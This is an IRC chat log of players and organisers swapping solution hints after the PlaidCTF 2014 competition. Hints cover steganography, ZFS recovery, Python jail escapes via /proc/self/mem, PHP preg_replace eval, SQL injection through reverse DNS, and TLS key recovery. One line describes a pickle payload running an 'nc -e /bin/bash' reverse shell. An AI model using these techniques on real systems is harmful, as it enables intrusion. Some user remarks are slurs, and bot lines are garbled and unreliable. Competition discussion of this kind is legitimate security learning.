(16:20:19) (_blasty_) LOL Beched
(16:20:27) (sven) :D
(16:20:29) (ryan-c) tylerni7: you mean one for server->client and one for client->server?
(16:20:33) (rray) thx ppp, it was a cool ctf
(16:20:34) (Ymgve) I think Beched got burned
(16:20:35) (+tylerni7) ryan-c: yep
(16:20:39) (arthurdent) tylerni7: how do you randomize the pallete?
(16:20:40) (@mserrano) rray: :)
(16:20:46) (Beched) Ymgve: ??
(16:20:48) (+tylerni7) arthurdent: open it up in something like 010
(16:20:56) (abuss) yeah, great problems! can't wait until I can do more than 10% of them :P
(16:21:03) (tomcr00se) mathiasbynens: sort of, i did "+6"
(16:21:11) (Beched) tomcr00se: the same with penthackon was at olympic
(16:21:29) (Adran) marcoscars02: Have you played with StegSolver? :)
(16:21:48) (marcoscars02) zsteg
(16:21:49) (marcoscars02) :S
(16:22:06) (marcoscars02) and a lot of brain xDD
(16:22:08) (sdjakl) l/win 18
(16:22:14) (keidii) any ZFS solution other than brute ?
(16:22:26) jOin: (D3AdCa7_) (d220a27e@gateway/web/freenode/ip.210.32.162.126)
(16:22:29) (+tylerni7) keidii: yes... but it was a pain
(16:22:30) (ryan-c) for steg, we just dicked around with setting all colors in the pallet except one to black
(16:22:41) (ryan-c) and found an interesting range of pallet entries
(16:22:42) (inter) tylerni7: do you know who made tenement?
(16:22:45) (mak`) tylerni7: tell me
(16:22:51) (keidii) tylerni7 , i droped reading zfs src/doc after few hours
(16:22:52) (+tylerni7) inter: gbarboza
(16:23:00) (mak`) i spend a lot h on this
(16:23:03) jOin: (Rexperience7) (~Rex@unaffiliated/rexperience7)
(16:23:06) qUit: (D3AdCa7) (d220a27e@gateway/web/freenode/ip.210.32.162.126) Ping timeout: 240 seconds
(16:23:06) qUit: (someone_) (d1cb4e22@gateway/web/freenode/ip.209.203.78.34) Ping timeout: 240 seconds
(16:23:14) (mak`) and got nothing at the end
(16:23:23) pArt: (sssssssss) (5a9c5102@gateway/web/freenode/ip.90.156.81.2)
(16:23:25) (Adran) i just randomized the colors and was able to make out all but the 'keep' part originally
(16:23:51) (pd7) what tool did you use to randomize the colors?
(16:23:58) (Adran) stegsolve
(16:23:59) (mak`) how one can find file if there is no data in dnode table?
(16:24:04) (pd7) thanks
(16:24:06) (ciliated) how to solve kpop?
(16:24:27) (mak`) ciliated: unserialize nad preg_replace
(16:24:29) (Adran) ciliated: http://paste2.org/Nn46z87k
(16:24:35) (abuss) anyone got a nightmare writeup?
(16:24:40) (mathiasbynens) clockish: nice! there must be a better way to find input groups for halphow2js rather than trial and error though
(16:24:48) (abuss) I heard you were supposed to write to /proc/self/mem but I got i/o err
(16:24:49) (clockish) abuss: write to /proc/self/mem
(16:24:52) (clockish) oh
(16:24:57) qUit: (erketu) (
[email protected]) Read error: Connection reset by peer
(16:24:57) (clockish) you have to write corectly
(16:25:02) (clockish) like, turn off buffering
(16:25:08) (abuss) oh hmm
(16:25:12) jOin: (Rinko) (3d812a67@gateway/web/cgi-irc/kiwiirc.com/ip.61.129.42.103)
(16:25:28) jOin: (mibbit_19028) (4a780f96@gateway/web/cgi-irc/kiwiirc.com/ip.74.120.15.150)
(16:25:37) (Ymgve) what was the solution to freya?
(16:25:54) (mibbit_19028) solution to pwn 100?
(16:25:56) (clockish) mathiasbynens: heh, not really, just once you realize you can do it with small numbers you just play around
(16:25:59) (robbje) mak`: same here :>
(16:26:03) (Pitr_) tyler, what did i miss on curlcore?
(16:26:03) (inter) mserrano
(16:26:06) (inter) how did i
(16:26:08) (inter) misread
(16:26:08) (ryan-c) tylerni7: How's the reading interface on parlor built? Is it basically dependent on the nonce being in a single packet?
(16:26:09) (inter) 1 with l
(16:26:10) (mak`) robbje: you did it?
(16:26:10) (mathiasbynens) clockish: ok cool, thanks for confirming
(16:26:13) (inter) i still cant believe it
(16:26:18) (+tylerni7) ryan-c: dude I dunno
(16:26:22) (+tylerni7) it's just simple python
(16:26:27) (+tylerni7) I wrote it as simply as possible :P
(16:26:27) (robbje) mak`: no :(
(16:26:29) (foundation) Pitr_: what did you do on curlcore ?
(16:26:34) (mak`) tylerni7:
(16:26:38) (Rexperience7) how to solve tenement
(16:26:41) (@mserrano) inter: :
(16:26:42) (robbje) i just wasted hours on it
(16:26:42) (@mserrano) (
(16:26:43) (ryan-c) tylerni7: You're just doing a socket read?
(16:26:43) (Pitr_) why was the memory layout in curlcores dump different from gnutls_int.h
(16:26:47) (robbje) Rexperience7: google egghunter
(16:26:51) (+tylerni7) ryan-c: yeah
(16:27:00) (Sin__) Rexperience7, just dump the whole memory and do strings
(16:27:01) (+gbarboza) Rexperience7: http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
(16:27:01) (foundation) i dumped the heap and searched for somethign resembleing the client random , first part you can take from ssl packet
(16:27:02) (+tylerni7) if it's multiple packets it might get sad (as in it'd just read the first one)
(16:27:13) (Rexperience7) oh
(16:27:14) (Rexperience7) EGGHUNTER
(16:27:15) ([pwn]Idolf) FUCKING HELL
(16:27:17) (Rexperience7) OHHHHHHH
(16:27:19) (+dickoff) Streaming question, do people care about the video part of plaidTV or just the music
(16:27:22) ([pwn]Idolf) We got code exec on the python jail now
(16:27:26) ([pwn]Idolf) 28 minutes too late
(16:27:31) (inter) dickoff: you should stream
(16:27:33) (Pitr_) foundation: i checked the order in the geaderfile
(16:27:34) (inter) of yo uguys
(16:27:35) (Sin__) what plaidtv ?
(16:27:37) ([pwn]Idolf) what was the intended solution?
(16:27:38) (inter) suffereing from 502 erros
(16:27:44) (mathiasbynens) [pwn]Idolf: what’s your exploit look like?
(16:27:45) (ryan-c) tylerni7: yeah, it didn't work when i tried to send stuff through netcat which breaks into packets by line.
(16:27:45) (mak`) dickoff: both
(16:27:49) (+ricky) Sin__: It's a video/audio stream dickoff did last year
(16:27:49) (@mserrano) [pwn]Idolf: use /proc/self/mem to overwrite a function pointer
(16:28:04) (robbje) mserrano: i think we solved it differently :)
(16:28:06) (muchacho) mserrano, how do you call "someshit"-file ?
(16:28:06) (ryan-c) tylerni7: worked when i used python and socket.sent
(16:28:08) (ryan-c) er
(16:28:09) (Sin__) like at the defcon quals? that would've been nice
(16:28:10) (ryan-c) send
(16:28:19) (+tylerni7) ryan-c: yeah
(16:28:20) (@mserrano) robbje: did you guys use a code object?
(16:28:22) (sven) so, i'm curious, how was zfs supposed to be solved?
(16:28:23) ([pwn]Idolf) mserrano: wtf, can you write using /proc/self/mem?
(16:28:27) ([pwn]Idolf) We tried that :/
(16:28:32) (+tylerni7) sven: zfs stuff...
(16:28:37) (robbje) mserrano: i think so
(16:28:44) (robbje) the exploit is huge and ugly :>
(16:28:44) (geobot) its ugly though
(16:28:48) (abuss) dickoff, did I miss a link to plaidtv?
(16:28:48) (+tylerni7) sven: frozencemetery and awreece know how
(16:28:49) (@mserrano) [pwn]Idolf: yeah, you have to set the modes correctly and shit
(16:28:52) (ryan-c) also fuck debugging endienness issues
(16:28:54) (abuss) 48 hours ago? :P
(16:28:55) (@mserrano) robbje: :) that's how clockish did it
(16:28:55) (+dickoff) abuss: I didn't do it this year
(16:29:02) (abuss) ah k
(16:29:07) ([pwn]Idolf) mserrano: ..... open("/proc/self/exe", "w")?
(16:29:13) qUit: (nUl1) (5d9dadb6@gateway/web/freenode/ip.93.157.173.182) Quit: Page closed
(16:29:17) (@mserrano) open("/proc/self/maps", "r+b")
(16:29:18) (clockish) robbje: you used a code object? <3
(16:29:22) (@mserrano) you also have to set buffering to zero or something
(16:29:31) qUit: (whois) (
[email protected]) Quit: Http://www.ZeroIRC.NET ¢Æ Zero IRC ¢Æ Ver 2.9
(16:29:34) (robbje) clockish: spq did it, yeah
(16:29:36) (abuss) ahhh
(16:29:37) ([pwn]Idolf) mserrano: what-the-shit.... that's not at ALL how we solved it :D
(16:29:47) qUit: (DKay) (uid11914@gateway/web/irccloud.com/x-pslnfvcgkqlkagfl) Quit: Connection closed for inactivity
(16:30:01) (clockish) [pwn]Idolf: what did you do?
(16:30:02) ([pwn]Idolf) mserrano: I'm considering sharing the exploit, but that would ruin a CTF-problem I'm designing :P
(16:30:03) (geobot) priv escalation vulnerabilities ruin it all
(16:30:13) (@mserrano) [pwn]Idolf: lol
(16:30:15) (+tylerni7) [pwn]Idolf: awww
(16:30:22) (@mserrano) I thought we would finally kill python jails
(16:30:23) (abuss) I was reading all the /proc/self/ stuff but only tried to write to mem
(16:30:23) (+tylerni7) [pwn]Idolf: just share it with us then ;)
(16:30:28) (@mserrano) with last year and this year
(16:30:44) (+dickoff) inter: mak` I'll bring it back in some fashion next year
(16:30:57) (+dickoff) doing videos is way more annoying than music
(16:31:08) ([pwn]Idolf) mserrano: well, I guess your solution is more general... but WHAT IF WE DIDN'T EVEN HAVE STDOUT?!? :D
(16:31:08) (muchacho) mserrano, how do you call "someshit"-file in kpop? What is the path?
(16:31:12) (Pitr_) we need more perl chals
(16:31:23) (@mserrano) muchacho: you don't need to call a file
(16:31:24) (+tylerni7) Pitr_: that can be arranged
(16:31:25) (sven) i want more non-x86 pwnables
(16:31:28) (clockish) [pwn]Idolf: I for one am super curious what you did :)
(16:31:33) (robbje) ban Pitr_
(16:31:33) (asmoday) IPV6
(16:31:34) (Tapyroe__) any one want to briefly tell me how to solve mt pox? XD
(16:31:34) (robbje) :>
(16:31:35) (@mserrano) muchacho: in fact it doesn't successfully write to that file
(16:31:35) (+tylerni7) sven: we'll see... that requires not EC2 for hosting
(16:31:37) (Pitr_) great!
(16:31:46) (abuss) oh I also wanted to say that I liked reekeeee
(16:31:49) (jix) or nen x86 reversing
(16:31:50) (sven) tylerni7: qemu on ec2 should work :)
(16:31:50) (abuss) it felt like a really solid web problem
(16:31:51) (@mserrano) muchacho: instead it uses preg_replace("/stuff/e", "phpcode()")
(16:31:57) (clockish) [pwn]Idolf: Given that I wrote the chall and couldn't find any other holes...
(16:32:00) (+tylerni7) sven: well.. qemu isn't the best
(16:32:03) Pitr_ trapt robbje in zijn ballen :D
(16:32:10) (Sin__) Tapyroe__, hash length extension
(16:32:19) (hammerpig) many thanks for ctf
(16:32:20) qUit: (hammerpig) (~user@gateway/tor-sasl/hammerpig) Quit: leaving
(16:32:28) (sven) tylerni7: ah, fair enough. it probably requires quite some cpu power if all people are trying to pwn it at the same time
(16:32:35) (mibbit_19028) tiffany was a pain all that antidebugging!
(16:32:41) jOin: (alex___) (b2c22e8b@gateway/web/freenode/ip.178.194.46.139)
(16:32:42) (+tylerni7) also annoying qemu bugs sometimes crop up
(16:32:43) ([pwn]Idolf) clockish: ok, sure... I'll upload it not
(16:32:48) (muchacho) mserrano, ah k damnit, thx!
(16:33:09) (Tapyroe__) Sin__: thanks!
(16:33:17) ([pwn]Idolf) clockish: https://gist.github.com/anonymous/dff51e9ec27deb828e1d
(16:33:24) (Pitr_) & thanks again, see you next year!
(16:33:47) (@mserrano) [pwn]Idolf: ok, so you used a code object
(16:33:47) (@mserrano) ok
(16:34:01) (inter) tylerni7 so what was the solution to rsa?
(16:34:02) (clockish) [pwn]Idolf: oh, a code object. Yeah, that was another way to do it.
(16:34:07) (inter) i had a chunk of code for it
(16:34:09) (inter) but didnt work
(16:34:12) (@mserrano) inter: there's a paper
(16:34:17) (@mserrano) they have a description of an algorithm
(16:34:17) (clockish) [pwn]Idolf: good work!
(16:34:22) (@mserrano) either find an implementation or write one
(16:34:23) (@mserrano) obtain flag
(16:34:27) (+tylerni7) inter: well... I wrote code from scratch... there is source that mostly works online though :(
(16:34:30) (+tylerni7) that I didn't know about (:
(16:34:31) (inter) r
(16:34:32) (inter) o
(16:34:33) (inter) f
(16:34:33) (+tylerni7) :(*
(16:34:33) (inter) l
(16:34:33) qUit: (makler2004) (
[email protected]) Quit: ChatZilla 0.9.90.1 [Firefox 28.0/20140314220517]
(16:34:42) (inter) aint nobody got time fo dat
(16:34:42) (inter) jk
(16:34:51) (inter) i sometimes wish i was black female
(16:34:53) (inter) so i can say that
(16:34:55) (inter) no racism
(16:35:02) (clockish) [pwn]Idolf: code obj is the more leet way to do it :)
(16:35:33) ([pwn]Idolf) clockish: /proc/self/mem was one of the first things I tried :/
(16:35:57) (clockish) [pwn]Idolf: yeah, I thought more people would use proc/self/mem because it is easier.
(16:35:59) (inter) clockish: your challs require too much creativity
(16:36:07) (clockish) inter: :D
(16:36:10) (inter) its too much for non-cs major kid
(16:36:11) (inter) :/
(16:36:33) (clockish) [pwn]Idolf: yeah, you need f = file('/proc/self/mem', 'r+b', 0); f.seek(i); x=f.read(l) to make it work
(16:36:47) (abuss) 0 for unbuffered?
(16:36:55) (clockish) abuss: yes
(16:36:59) ([pwn]Idolf) clockish: when it didn't work initially, I found somewhere on the web that said you apparently couldn't do it :/
(16:37:09) (jjk_) to the zfs - i constructed a new uberblock pointing to newer blocks and used ufs explorer to extract the data (as it ignores the checksums)
(16:37:10) (@mserrano) it depends on your system :(
(16:37:11) (clockish) [pwn]Idolf: :/
(16:37:14) ([pwn]Idolf) I tried "rwb"
(16:37:21) (@mserrano) jjk_: that was the intended solution :)
(16:37:29) (+dickoff) so how big of a party is 0xffa throwing?! _blasty_, ius, iZsh, etc
(16:37:33) qUit: (mibbit_19028) (4a780f96@gateway/web/cgi-irc/kiwiirc.com/ip.74.120.15.150) Quit: mibbit_19028
(16:37:41) (clockish) [pwn]Idolf: yeah, it works on every machine I've tried it on, except for mserrano's :P
(16:37:51) qUit: (random_user_23) (5d6846fd@gateway/web/freenode/ip.93.104.70.253) Quit: Page closed
(16:37:56) (@mserrano) yeah it fails on my droplet
(16:38:11) ([int3]romansoft) jjk_: can you elaborate on that? (zfs)
(16:38:13) mOde: (mserrano) sets (+v clockish)
(16:38:15) mOde: (mserrano) sets (-o mserrano)
(16:38:34) (jjk_) mserrano: it took me a while to notice the uber-corruption in challenge description :)
(16:39:07) (mak`) jjk_: im zfs n00b could you elaborate?
(16:39:08) (poppopret) anyone got a g++ writeup?
(16:39:13) (+tylerni7) poppopret: well
(16:39:15) (+cai_) thanks for leaving feedback. they greatly help us to improve pctf every year :)
(16:39:25) (+tylerni7) basically it does matrix multiplication on your key over gf(257)
(16:39:32) (+cai_) if you haven't done it yet, please take our survey: http://bit.ly/1ifQBOo
(16:39:39) (+dickoff) ^^^
(16:39:45) (mak`) i was trying to find metadata like here: http://www.joyent.com/blog/zfs-forensics-recovering-files-from-a-destroyed-zpool
(16:39:54) (+tylerni7) poppopret: not quite a writeup, but yeah that's how it verified your key
(16:39:55) (inter) anyways
(16:39:59) (mak`) but find only zap with file names and id
(16:40:02) (inter) i has my writeup in very very short point form
(16:40:15) (mak`) and there was no data in dnode tables
(16:40:18) (mak`) at this id
(16:40:20) (jjk_) i can recommend ondiskformat.pdf for zfs structure
(16:40:24) (poppopret) ahhh
(16:40:24) (poppopret) ok
(16:40:25) (inter) gg is gay
(16:40:28) (poppopret) thanks tyler
(16:40:29) qUit: (sibios) (~sibios@unaffiliated/sibios) Quit: Leaving
(16:40:35) (+clockish) poppopret: some people (incl me!) solved it by making the C++ more readable, and then noticing the key can be brute forced 4 bytes at a time.
(16:40:35) (+tylerni7) poppopret: I'm sure someone will post a better writeup for it
(16:40:37) (mak`) yeah was reading it
(16:40:51) (irctc736) anyone has a writeup on bronies?
(16:40:54) (foundation) tylerni7: please tell me you didn't write that by hand
(16:40:56) (Sin__) clockish, was there a better way ?
(16:41:01) (+tylerni7) foundation: I... did
(16:41:08) (+tylerni7) iteratively, but by hand
(16:41:12) (inter) clockish: yep 4 bytes a type
(16:41:22) (+cai_) we'll soon make a page that lists all the write-ups submitted to us (via email or dropped in IRC)
(16:41:23) (+clockish) Sin__: for g++? yeah, read the code and understand that it's GF(207)
(16:41:26) (+clockish) But math is hard.
(16:41:28) (jjk_) mak`, [int3]romansoft and here is my ugly python code to find uberblocks - http://pastebin.com/Y14B2RAh
(16:41:29) (inter) pos 0,4,8,12
(16:41:32) (Sin__) it is
(16:41:32) (inter) but then
(16:41:34) (jmgrosen) so, how do you do bronies part 1? that's been bothering me
(16:41:34) (poppopret) where do we submit writeups to?
(16:41:35) (inter) i misread
(16:41:37) (inter) 1 as l
(16:41:38) (inter) or
(16:41:39) (sven) "see suspicious file name, figure out it's two files XOR'ed together, find out a suspicious block just before the file name, xor that with whole file, strings. profit"<-- how aDR4eA solved zfs :)
(16:41:39) (inter) l as 1
(16:41:42) (inter) and lost the breakthru
(16:41:43) (inter) fuckkk
(16:41:46) (+clockish) Sin__: So i'd say brute force is actually the better solution :P
(16:41:49) (jjk_) and the missing blocks
(16:41:50) (abuss) cai_, fixed mine: http://sigint.ru/writeups/2014/04/13/plaidctf-2014-writeups/
(16:41:55) (shabgrd) I think half the world solved crypto 20 expect for me :(
(16:41:55) ([int3]romansoft) cai_: for next year, a simple board that lets up read the problems and send the flags. No more is needed.
(16:41:56) (geobot) oo i like skier_ too late to make friends at the ai is littered with you have a lot of simple binaries(no arm, x86-32)
(16:42:07) (poppopret) where do we submit writeups to?
(16:42:17) (+tylerni7) [int3]romansoft: it's what happens when we try to innovate :(
(16:42:29) (abuss) Hmm I liked the fancy board and the voting mechanics
(16:42:31) (+clockish) poppopret: nothing PPP official, but there's a CTFs writeups github that aggregates writeups
(16:42:39) (poppopret) ok
(16:42:41) ([pwn]Idolf) clockish: the main reason our exploit didn't work? We had a '|' instead of a 'd'
(16:42:43) (phiber__) innovating is fine, but please have a fallback simple interface
(16:42:44) (abuss) it worked surprisingly well across my devices
(16:42:47) (+cai_) [int3]romansoft: you might actually get that. i'm quitting after this one is wrapped up.
(16:42:47) (+mserrano) [pwn]Idolf: awwwwww
(16:43:02) (+tylerni7) poppopret: if you put them in here we'll try to keep up with them
(16:43:06) qUit: (alex___) (b2c22e8b@gateway/web/freenode/ip.178.194.46.139) Ping timeout: 240 seconds
(16:43:11) ([pwn]Idolf) mserrano: ok, I'll stop whining now and go to bed :P
(16:43:14) (+tylerni7) cai_: <3
(16:43:17) (+tylerni7) :(
(16:43:33) (phiber__) I didn't know you could switch the board to see more problems until 8h passed
(16:43:41) (upb) abuss: "This is the form of a signed, timestamped data cookie. The period at the beginning of the string indicates that the cookie is zlib-compressed, " <- Is that standard for some framework or?
(16:43:53) (+tylerni7) upb: yeah, standard for django
(16:43:56) (upb) ah
(16:43:56) (+tylerni7) maybe more as well
(16:43:59) (abuss) upb, I had just spent a while on reekeee
(16:44:02) (abuss) which was very similar
(16:44:06) (phiber__) the mourse cursor doesn't change when hovering over any clickable thing
(16:44:08) (deject3d) what was the solution to reekee anyway
(16:44:11) (jmgrosen) anyone have a writeup of part 1 of bronies up yet?
(16:44:12) (deject3d) or at least where was the flag
(16:44:14) (iago-x86) I just realized I haven't eaten today :)
(16:44:19) (Dumpling) https://github.com/isislab/CTF-Solutions/tree/master/PCTF_2014 <- solutions for mtpox, kpop, and kappa
(16:44:21) (abuss) deject3d, after getting the secrets.py
(16:44:24) (abuss) you can forge cookies
(16:44:25) qUit: (zTrix_) (~zTrix@2402:f000:d:8001:2969:4da7:2b93:32a0) Quit: WeeChat 0.4.3
(16:44:27) (LuckyY) phiber__: +1
(16:44:28) (abuss) it took me a while to get it to work
(16:44:31) (deject3d) yeah i never got my cookies to work
(16:44:41) (abuss) cause I didn't notice django had their own b64_decode that tweaked padding
(16:45:05) (deject3d) humph
(16:45:12) (deject3d) i tried for so long to get a cookie to work
(16:45:13) (deject3d) oh well
(16:45:17) (abuss) then you assemble a pickle that calls os.system('nc -e /bin/bash/ server port')
(16:45:37) qUit: (chrissing) (
[email protected]) Remote host closed the connection
(16:45:38) (abuss) and use the shell to run a program on a file that spits the key
(16:45:38) (geobot) sweet, i'm finally getting out about ctf and change it in donald glover, it spits out that some of us are going to open source code for about pony porn warez
(16:45:42) (phiber) the mourse cursor doesn't change when hovering over any clickable thing
(16:45:43) (deject3d) ah damn
(16:45:44) (phiber) so it was really hard to notice the board was interactive
(16:46:19) (abuss) agree with phiber, changing the mouse cursor when over something clickable would have been nice
(16:47:16) (+awesie) phiber abuss: i agree, forgot about that; UX is hard when you are the designer / developer / tester
(16:47:21) (mischa__) whatscat writeups available?
(16:47:41) ([CISSP]HoLyVieR) mscha__: check the reset password feature
(16:47:53) ([CISSP]HoLyVieR) mischa__: there's a SQLi in there
(16:48:00) (Dumpling) sqli via your rdns?
(16:48:01) jOin: (ijonas) (534e453a@gateway/web/freenode/ip.83.78.69.58)
(16:48:06) ([CISSP]HoLyVieR) no the username
(16:48:08) (Sin__) via username
(16:48:27) (phiber) I did sqli via rdns records
(16:48:30) (tsuro) damn, we did it via rdns :)
(16:48:42) (+tylerni7) rdns was probably easier
(16:48:46) (phiber) much easier than blind sqli on username
(16:48:48) (+tylerni7) yeah
(16:48:49) (xp45g) via rdns O_o
(16:48:51) (mischa__) we had a sqli in our TXT record
(16:48:52) (abuss) phiber, huh that's cool
(16:49:09) ([CISSP]HoLyVieR) username was a pain to exploit tough 64 caracters limit :/
(16:49:16) (abuss) which provider lets you screw with rdns like that?
(16:49:22) (fester) he.net
(16:49:31) (xp45g) i used username to test one flag char at a time
(16:49:43) (abuss) ah
(16:49:45) (xp45g) if test was successful the query would reset pass for my 2nd account
(16:49:47) (KT) btw who is 0xffa?
(16:49:51) (fester) actually, you just need a rdns to point to a valid dns, it looks up all records of the dns entry (even txt)
(16:49:55) (phiber) abuss, your provider usually only lets you change the rdns entry
(16:49:57) (+mserrano) KT: eindbazen + fail0verflow
(16:50:01) (phiber) so you point that to a host you control
(16:50:09) (phiber) and a dns server you control
(16:50:09) (KT) mserrano: oh, i see, thx
(16:50:11) (Guest17539) is there any writeup for hudak?
(16:50:16) qUit: (_simo) (
[email protected]) Quit: segfault at 7fff1ebe5000 ip 000000000041274b sp 00007fff1ebe32f8 error 6
(16:50:28) (inter) looking for solutions to tenement
(16:51:09) (iZsh) tylerni7: there is an easier way for curlcore
(16:51:39) (+tylerni7) iZsh: how'd you do it?
(16:51:42) (iZsh) tylerni7: you get the sessionID from wireshark, you search for this, and the masterkey is just before that key, then you feed that to wireshark and that's it
(16:51:42) (fester) i asked my provider to change my rdns txt entry and they marked my vps as 'High Risk'
(16:51:52) (Reinhart) mserrano: we ended up solving it using the slide attack, but also had a brute forcer running that ended up finding the flag while I was sleeping
(16:51:55) (ciliated) how to solve doge_stage?
(16:52:04) (+tylerni7) iZsh: ah, interesting
(16:52:05) (iZsh) tylerni7: that's why it took like a few minutes to solve :)
(16:52:13) (plaintext) we solved doge by sorting the palette by number of pixels that have that color
(16:52:16) (plaintext) and changing the top N to black
(16:52:17) (+clockish) ciliated: one way is to randomize the palate colors
(16:52:18) (+mserrano) Reinhart: hehe
(16:52:20) (plaintext) the key starts appearing
(16:52:26) (+clockish) plaintext: yep
(16:52:28) (corpille) gimp -> map ;)
(16:52:28) ([CISSP]HoLyVieR) at 127 to 208
(16:52:33) (+mserrano) next time I will make the blocks bigger
(16:52:35) (+mserrano) so that that doesn't work
(16:52:39) (ciliated) thanks
(16:52:43) (inter) real
(16:52:51) (inter) [14:52] <+mserrano> next time I will make the blocks bigger
(16:52:57) (D3AdCa7_) I solve doge by divide that image into two...
(16:53:11) (+mserrano) inter: 3 bytes is not that many bytes
(16:53:19) (inter) you could have 1
(16:53:28) ([CISSP]HoLyVieR) change the color of palette from 127 to 208 to black and rest white and it gives the text
(16:53:29) (abuss) were there any solutions to halpjs that didn't involve string tricks?
(16:53:49) (+mserrano) abuss: not afaik
(16:53:51) (abuss) more to the point, were there any x besides 1 and 6 such that mystop(x) == x?
(16:53:53) (Rinko) a random shuffle on the palette works well though
(16:53:58) (abuss) ah
(16:53:59) (plaintext) it's impossibru without string ticks
(16:54:03) (inter) o
(16:54:03) (inter) btw
(16:54:04) (plaintext) you need 3 different values map to themselves
(16:54:05) (inter) mserrano,
(16:54:07) (inter) how did you guys
(16:54:10) (abuss) okay that's a bit comforting then :P
(16:54:16) (inter) manage to fix the server load
(16:54:21) (inter) in the early stage of ctf?
(16:54:22) (+mserrano) inter: I honestly have no idea
(16:54:25) (inter) im more interested in that
(16:54:33) (Reinhart) mserrano: this solved it purely by bruteforce in ~6hrs or so https://p.6core.net/p/hoVp1HHotIIKVpVBTyL1xRJ8
(16:54:36) (+mserrano) the relevant people worked magic the way they always do
(16:54:37) (phiber) crypto parlor was hash length extension right?
(16:54:51) jOin: (albntomat0) (8c201003@gateway/web/freenode/ip.140.32.16.3)
(16:55:12) (+mserrano) phiber: yes
(16:55:16) (+tylerni7) inter: cai_ and awesie worked their magic
(16:55:23) (Tapyroe__) Reinhart: which problem was that for?
(16:55:23) (jmgrosen) Dumpling: did you write those write-ups?
(16:55:23) (inter) OHH
(16:55:33) (phiber) I didn't have enough time to code everything
(16:55:35) (Dumpling) jmgrosen: two out of the three
(16:55:37) (+mserrano) yeah
(16:55:48) (+mserrano) there's like some rule of the universe that says that everything must go wrong on friday at 5 pm
(16:55:53) (jmgrosen) Dumpling: could you explain kpop? I don't get how the system() call is getting eval'd
(16:55:55) (+mserrano) and then magic happens and it eventually gets fixed
(16:55:56) (deject3d) where was the flag for whatscat? was it in the database?
(16:56:01) (+awesie) inter: tl;dr once caching was working correctly and the wsgi servers stopped acting weird, load was less of an issue
(16:56:02) (Reinhart) Tapyroe__: wheeee
(16:56:08) (phiber) also I got up to $64K playing manually lol
(16:56:17) (+cai_) inter: awesie will post some notes on that on our blog
(16:56:21) (Dumpling) jmgrosen: preg_replace has a /e flag for dynamic replacements and stuff, it basically evals code
(16:56:29) (corpille) what was tenement ?
(16:56:39) (robbje) corpille: egghunting shellcode
(16:56:42) (jmgrosen) Dumpling: ........wow, that's pretty ridiculous o_O
(16:56:42) (Reinhart) Tapyroe__: but as I said, we solved it using the slide attack before this brute forcer finished
(16:56:47) jmgrosen reminds himself never to use php
(16:56:54) (abuss) I was going to script parlor to keep betting the farm on 2^20 odds, which would've required 500,000 requests or so
(16:57:02) (Tapyroe__) ah right, Reinhart! thanks :) dont think I even tried wheeee
(16:57:04) (corpille) egghunting shellcode mmm ... okay :)
(16:57:12) (abuss) it was going too slowly, but did anyone else manage that?
(16:57:34) (deject3d) whatscat was a sql injection but was the flag stored in a file? were file perms on or anything?
(16:57:36) qUit: (irctc736) (806f3006@gateway/web/freenode/ip.128.111.48.6) Ping timeout: 240 seconds
(16:58:02) ([CISSP]HoLyVieR) deject3d: I heard it was in "flag" table
(16:58:03) (geobot) his dinner table x|
(16:58:08) (xp45g) deject3d: flag was in the db
(16:58:40) (iZsh) O.o about https://twitter.com/HacknamStyle/status/455453769824612352
(16:58:41) (spq) hm, i didnt know we can still write into /dev/mem (for python jail) solved it completely within python (python function opcodes -> libc system("/bin/sh") )
(16:59:07) (abuss) NICE
(16:59:25) (Dumpling) spq: got a writeup for that?
(16:59:25) (inter) does any of you know solutions to curlcore?
(16:59:34) (iZsh) hijacking the support email is a nice way to get hints ;-)
(16:59:37) (deject3d) anyone have a brony writeup?
(16:59:38) (spq) Dumpling: not ready :D
(16:59:40) (Rinko) btw does "hudak" refers to Paul Hudak? closure and lazy evaluation everywhere in this problem
(16:59:45) (phiber) I tried replacing function bytecode, but if I replaced it with something that imported os it failed
(16:59:45) (+mserrano) Rinko: yes.
(16:59:47) (plaintext) yep
(16:59:48) (___Sin) iZsh, that's so nasty
(16:59:55) (plaintext) we only figured out that hint in the end
(16:59:58) (phiber) anyone did it that way?
(16:59:58) (+mserrano) phiber: we held an import lock
(17:00:00) (plaintext) hudak was a nice task btw
(17:00:06) (+mserrano) phiber: so you couldn't import anyway
(17:00:13) (inter) phiber: acquire_lock()
(17:00:19) (phiber) oh
(17:00:31) (inter) but
(17:00:37) (inter) does anyone know solutions to curlcore?
(17:00:44) (iZsh) inter: yes
(17:00:51) (inter) iZsh: may i pm you :D
(17:00:54) (+mserrano) inter: find the aes keys, decrypt the traffic, get flag
(17:01:02) (inter) well
(17:01:02) (iZsh) mserrano: easier way :)
(17:01:05) (inter) i looked for
(17:01:08) (inter) temporary ssl keys
(17:01:11) (inter) in corefile
(17:01:12) (phiber) I also thought about writing to /self/mem but I was too busy on other challenges
(17:01:13) qUit: (ciliated) (99bd4541@gateway/web/freenode/ip.153.189.69.65) Quit: Page closed
(17:01:18) (inter) but i didnt find any patterns
(17:01:29) (inter) what was the methods to find the aes key in the corefile?
(17:01:30) (phiber) there were too many challenges
(17:01:41) (iZsh) inter: you can open it in wireshark, look at the SessionID, search for it in a hex editor in the dump, just before that, you'll have the size of the sessionid, and then before that, the masterkey
(17:01:41) (geobot) and the masterkey is just before
(17:01:54) (inter) open corefile?
(17:02:02) (phreeek) mserrano: one question to kpop, I got only a 500 error with your payload
(17:02:04) (inter) oh
(17:02:05) (inter) nvm
(17:02:06) (inter) OHH
(17:02:07) (inter) okay
(17:02:08) (iZsh) inter: then you write a file called key.txt which contains the sessionid and the masterkey and you can feed that to wireshark for decryption
(17:02:08) (inter) wow
(17:02:27) (inter) damn
(17:02:44) (inter) it feels like a hammer just slammed my face to the floor
(17:02:57) (inter) thanks iZsh :D
(17:02:58) (iZsh) that one was fast to solve :)
(17:03:04) (inter) well
(17:03:10) (inter) my brain was already tortured by misc250 and pyjail
(17:03:24) (inter) n0sleep.tv
(17:03:25) (plaintext) damn, who handles the Plaid twitter acc?
(17:03:31) (plaintext) i made a mistake with my writeup :8
(17:03:40) (foundation) http://pastebin.com/3Kw2HZjP patch for tor for rendezvous
(17:03:48) (inter) yeah
(17:03:49) (inter) i knew
(17:03:51) (inter) what i wanted to do
(17:04:03) (inter) but i couldnt find the function get_node_by_name or something
(17:04:16) (inter) i tried hardcoding to fill out the structs
(17:04:19) (inter) but i failed LOL
(17:04:40) (dwn) how were we suppsoed to guess there was a flags table in whatscat ;_;
(17:04:41) (foundation) took a while
(17:04:54) (dwn) also that box has the slowest updating dns cache
